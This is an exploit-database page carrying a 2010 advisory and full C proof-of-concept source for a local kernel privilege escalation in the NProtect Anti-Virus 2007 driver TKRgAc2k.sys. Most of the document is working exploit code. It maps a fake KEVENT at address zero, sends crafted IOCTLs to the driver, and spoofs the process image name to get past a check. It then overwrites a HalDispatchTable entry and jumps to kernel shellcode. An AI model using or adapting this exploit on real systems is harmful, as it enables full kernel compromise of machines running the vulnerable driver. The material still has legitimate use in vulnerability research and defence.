Vulners
Lucene search
NProtect Anti-Virus 2007 Privilege Escalation
`NProtect Anti-Virus 2007 with TKRgAc2k.sys <= 2010.5.11.1
Local Kernel Mode Privilege Escalation Vulnerability
AUTHOR
MJ0011
EMAIL
th_decoder$126.com
VULNERABLE PRODUCTS
NProtect Anti-Virus 2007
DETAILS:
TKRgAc2k.sys create a device called "TKRgAc",and handles these io control codes for:
0x22140:Receive registry monitor key value name MD5
0x221448:Receive Registry monitor key name
0x221444:Receive Registry key monitor enable
0x221410:Receive virus name that matchs the key value name MD5
0x220c54:Create share memory for receive virus notification
0x220c5c:Receive event handle for send virus notification
Tkacrg2k.sys create FileObject->FsContext for each process to open the device,and save key/key value /virus name /event object in FsContext. Here contains a design error , if a registry operation is intercepted and match the rules , but event handle has not been set, TKAcRg2k.sys will still be nofity of this event to ring3 with KeSetEvent(NULL,0). An attacker can allocate a fake KEVENT structure at zero address and overwrite any address with KEvent->WaitThreadList->KThread->WaitListEntry 's remove list entry operation.
EXPLOIT CODE:
// NP0DAY.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
typedef struct _STRING {
USHORT Length;
USHORT MaximumLength;
PCHAR Buffer;
} STRING;
typedef STRING *PSTRING;
typedef struct _RTL_DRIVE_LETTER_CURDIR {
USHORT Flags;
USHORT Length;
ULONG TimeStamp;
STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;
#define RTL_MAX_DRIVE_LETTERS 32
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
typedef struct _CURDIR {
UNICODE_STRING DosPath;
HANDLE Handle;
} CURDIR, *PCURDIR;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
HANDLE ConsoleHandle;
ULONG ConsoleFlags;
HANDLE StandardInput;
HANDLE StandardOutput;
HANDLE StandardError;
CURDIR CurrentDirectory; // ProcessParameters
UNICODE_STRING DllPath; // ProcessParameters
UNICODE_STRING ImagePathName; // ProcessParameters
UNICODE_STRING CommandLine; // ProcessParameters
PVOID Environment; // NtAllocateVirtualMemory
ULONG StartingX;
ULONG StartingY;
ULONG CountX;
ULONG CountY;
ULONG CountCharsX;
ULONG CountCharsY;
ULONG FillAttribute;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING WindowTitle; // ProcessParameters
UNICODE_STRING DesktopInfo; // ProcessParameters
UNICODE_STRING ShellInfo; // ProcessParameters
UNICODE_STRING RuntimeData; // ProcessParameters
RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the
BOOLEAN ReadImageFileExecOptions; //
BOOLEAN BeingDebugged; //
BOOLEAN SpareBool; //
HANDLE Mutant; // INITIAL_PEB structure is also updated.
PVOID ImageBaseAddress;
PVOID Ldr;
struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;
} PEB, *PPEB;
typedef LONG KPRIORITY;
typedef struct _PROCESS_BASIC_INFORMATION {
LONG ExitStatus;
PVOID PebBaseAddress;
ULONG_PTR AffinityMask;
KPRIORITY BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;
typedef enum _EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
} EVENT_TYPE;
typedef struct _DISPATCHER_HEADER {
union {
struct {
UCHAR Type;
union {
UCHAR Absolute;
UCHAR NpxIrql;
};
union {
UCHAR Size;
UCHAR Hand;
};
union {
UCHAR Inserted;
BOOLEAN DebugActive;
};
};
volatile LONG Lock;
};
LONG SignalState;
LIST_ENTRY WaitListHead;
} DISPATCHER_HEADER , *PDISPATCHER_HEADER;
typedef const UNICODE_STRING *PCUNICODE_STRING;
typedef enum _WAIT_TYPE {
WaitAll,
WaitAny
} WAIT_TYPE;
typedef struct _OBJECT_BASIC_INFORMATION {
ULONG Attributes;
ACCESS_MASK GrantedAccess;
ULONG HandleCount;
ULONG PointerCount;
ULONG PagedPoolCharge;
ULONG NonPagedPoolCharge;
ULONG Reserved[ 3 ];
ULONG NameInfoSize;
ULONG TypeInfoSize;
ULONG SecurityDescriptorSize;
LARGE_INTEGER CreationTime;
} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION;
typedef struct _KWAIT_BLOCK {
LIST_ENTRY WaitListEntry;
PVOID kThread;
PVOID Object;
struct _KWAIT_BLOCK *NextWaitBlock;
USHORT WaitKey;
UCHAR WaitType;
} KWAIT_BLOCK, *PKWAIT_BLOCK, *PRKWAIT_BLOCK;
#include "malloc.h"
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{
__asm
{
push 0
push mSize
push mPtr
push ATableType
call pZwQuerySystemInformation
mov status , eax
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2,
ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
PUCHAR *Str
);
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
" "
" "
" "
" ---- ===== EXPLOIT SUCCESSFULLY ==== ---- "
" "
" "
" NProtect AntiVirus 2007 Local Privilege Escalation Exploit "
" "
" VULNERABLE PRODUCT "
" "
" NProtect AntiVirus 2007 "
" "
" "
" VULERABLE FILE "
" TKRgAc2k.sys <= 2010.5.11.1 "
" "
" AUTHOR "
" "
" MJ0011 "
" th_decoder$126.com "
" "
" 2010-9-7 "
" "
" "
" ";
VOID InbvShellCode()
{
//DISABLE INTERRUPT
__asm
{
cli
}
//RESET TO VGA MODE
InbvAcquireDisplayOwnership();
InbvResetDisplay();
//FILL FULL SCREEN
InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
InbvInstallDisplayStringFilter(NULL);
InbvEnableDisplayString(TRUE);
InbvSetScrollRegion( 0 , 0 , 639 ,477);
InbvDisplayString(DisplayString);
while(TRUE)
{
};
}
BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);
if (hlib == NULL)
{
return FALSE ;
}
InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ;
}
return FALSE ;
}
typedef struct MD5_STRING{
CHAR Md5[32];
}MD5_STRING , *PMD5_STRING;
typedef struct MD5_SEND{
ULONG Md5Number ;
ULONG DataLen ;
MD5_STRING Md5String[2];
}MD5_SEND , *PMD5_SEND;
typedef struct MON_RULE_SEND
{;
ULONG unknown ;
ULONG dataLen ;
CHAR RuleData1[10];
CHAR RuleData2[9];
}MON_RULE_SEND , *PMON_RULE_SEND;
typedef struct VIRUS_NAME_RULE_SEND
{
ULONG NumberOfName ;
ULONG TotalDataLen ;
CHAR Name[0x64];
}VIRUS_NAME_RULE_SEND , *PVIRUS_NAME_RULE_SEND;
int main(int argc, char* argv[])
{
printf("NProtect AntiVirus TKRgAc2k.sys <= 2010.5.11.1\n"
"Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
"Test On Windows XP SP3\n"
"by MJ0011 th_decoder$126.com\n"
"Press Enter....\n"
);
getchar();
PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
if (!InbvInit(pmi->Module[0].Base , strrchr(pmi->Module[0].ImageName , '\\')+1))
{
printf("cannot init inbv system\n");
return 0 ;
}
HMODULE hntos = LoadLibrary(strrchr(pmi->Module[0].ImageName , '\\')+1);
if (hntos == 0 )
{
printf("cannot load ntos\n");
return 0 ;
}
PVOID pHalDispatchTable = GetProcAddress(hntos , "HalDispatchTable");
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);
pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pmi->Module[0].Base);
PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG));
FreeLibrary(hntos);
PVOID palloc = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");
ULONG nsize = 0x1000 ;
PVOID pBase = (PVOID)0x1 ;
LONG status ;
__asm
{
push 0x4
push 0x3000
lea eax , nsize
push eax
push 0
lea eax , pBase
push eax
push 0xffffffff
call palloc
mov status , eax
}
if (status != 0 )
{
printf("allocate at 0 failed! %08x\n",status);
getchar();
return 0 ;
}
//build fake KEVENT
PDISPATCHER_HEADER pdh = (PDISPATCHER_HEADER)0x0 ;
KWAIT_BLOCK kwb ;
BYTE pShellCode[0x20];
KWAIT_BLOCK kwbpdh ;
pdh->Type = SynchronizationEvent;
pdh->WaitListHead.Flink = (PLIST_ENTRY)&kwbpdh ;
PVOID pkthread = malloc(0x1000);
kwbpdh.WaitType = WaitAny ;
kwbpdh.kThread = pkthread;
*(ULONG*)((ULONG)pkthread+ 0x5c) = (ULONG)&kwb ;
kwb.WaitListEntry.Flink = (PLIST_ENTRY)pShellCode ;
kwb.WaitListEntry.Blink = (PLIST_ENTRY)xHalQuerySystemInformationAddr ;
kwb.NextWaitBlock = &kwb ;
//wait list entry
*(ULONG*)((ULONG)pkthread+ 0x60) = 0 ;
//Thread->Timer->Header->Inserted
*(BOOLEAN*)((ULONG)pkthread+ 0xF3) = FALSE ;
//Thread->Queue
*(ULONG*)((ULONG)pkthread+ 0xe4) = NULL ;
#define LOW_REALTIME_PRIORITY 16
//thread->Priority
*(BYTE*)((ULONG)pkthread+ 0x33) = LOW_REALTIME_PRIORITY ;
//thread->eprocess
PVOID pkprocess = malloc(0x1000);
*(ULONG*)((ULONG)pkthread+ 0x44) = (ULONG)pkprocess;
//kprocess->state
*(BYTE*)((ULONG)pkprocess + 0x65) = 2 ;
PVOID preadylist = malloc(0x1000);
*(ULONG*)((ULONG)pkprocess + 0x44) = (ULONG)preadylist;
HANDLE hdev = CreateFile("\\\\.\\TKRgAc" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );
if (hdev == INVALID_HANDLE_VALUE)
{
printf("cannot open dev %u\n" , GetLastError());
return 0 ;
}
MD5_SEND ms ;
memset(&ms , 0 , sizeof(ms));
ms.DataLen = 32 * 2 + 8 ;
ms.Md5Number = 1 ;
strcpy(ms.Md5String->Md5 , "202CB962AC59075B964B07152D234B70");
//202CB962AC59075B964B07152D234B70 = "123"
ULONG btr ;
if (!DeviceIoControl(hdev , 0x22140C, &ms , sizeof(ms) , NULL , 0 , &btr , 0))
{
printf("send md5 %u\n", GetLastError());
getchar();
return 0 ;
}
MON_RULE_SEND mrs ;
memset(&mrs , 0 , sizeof(mrs));
mrs.dataLen = 0x13 ;
strcpy(mrs.RuleData1 , "*Classes*");
strcpy(mrs.RuleData2 , "*CLSID*");
if (!DeviceIoControl(hdev , 0x221448 , &mrs , sizeof(mrs) , NULL , 0 , &btr, 0 ))
{
printf("send rule %u\n",GetLastError());
getchar();
return 0 ;
}
BOOLEAN open741 = FALSE ;
if (!DeviceIoControl(hdev , 0x221008 , &open741 , sizeof(BOOLEAN) , NULL , 0 , &btr , 0 ))
{
printf("open 741 %u\n",GetLastError());
getchar();
return 0 ;
}
ULONG data[4];
data[0] = 0x1dfff ;
data[1] = 0x0 ;
data[2] = 0x1 ;
data[3] = 0x1 ;
if (!DeviceIoControl(hdev , 0x221444 , &data , sizeof(ULONG) * 4 , NULL , 0 , &btr , 0 ))
{
printf("set 724 %u\n" , GetLastError());
getchar();
return 0 ;
}
VIRUS_NAME_RULE_SEND vnrs ;
memset(&vnrs , 0 , sizeof(vnrs));
strcpy(vnrs.Name , "VULN ATTACK !!!! :)");
vnrs.NumberOfName = 1 ;
vnrs.TotalDataLen = 0x64 ;
if (!DeviceIoControl(hdev , 0x221410 , &vnrs , sizeof(vnrs ) , NULL , 0 , &btr , 0 ))
{
printf("send virus name %u\n" , GetLastError());
getchar();
return 0 ;
}
ULONG numbuf = 0x64 ;
ULONG outbuf[2];
if (!DeviceIoControl(hdev , 0x220C54 ,&numbuf , sizeof(ULONG) , &outbuf , sizeof(ULONG) * 2 , &btr , 0 ))
{
printf("set share memory %u\n" ,GetLastError());
getchar();
return 0 ;
}
//fake PEB bypass check
PVOID pqp = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQueryInformationProcess");
PROCESS_BASIC_INFORMATION pbi ;
nsize = sizeof(pbi);
__asm
{
push 0
push nsize
lea eax , pbi
push eax
push 0
push 0xffffffff
call pqp
}
PPEB peb = (PPEB)pbi.PebBaseAddress;
PVOID psavebuf = malloc(peb->ProcessParameters->ImagePathName.Length );
RtlCopyMemory(psavebuf , peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , L"iexplore.exe" , 26 );
HKEY hkey ;
if (RegOpenKey(HKEY_CLASSES_ROOT , "CLSID" , &hkey)==ERROR_SUCCESS)
{
DWORD regtype = REG_DWORD ;
DWORD Data = 0 ;
DWORD cbdata = 4;
//target KeSetEvent!
RegQueryValueEx(hkey , "123" , NULL , ®type , (LPBYTE)&Data , &cbdata);
}
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , psavebuf , peb->ProcessParameters->ImagePathName.Length);
//set shellcode
*(BYTE*)((ULONG)pShellCode) = 0xe9 ;
*(ULONG*)((ULONG)pShellCode + 0x1) = (ULONG)InbvShellCode - (ULONG)pShellCode - 0x5 ;
PVOID pqi = GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryIntervalProfile");
__asm
{
push 0
push 2
call pqi
}
return 0;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2010 00:00Current
0.7Low risk
Vulners AI Score0.7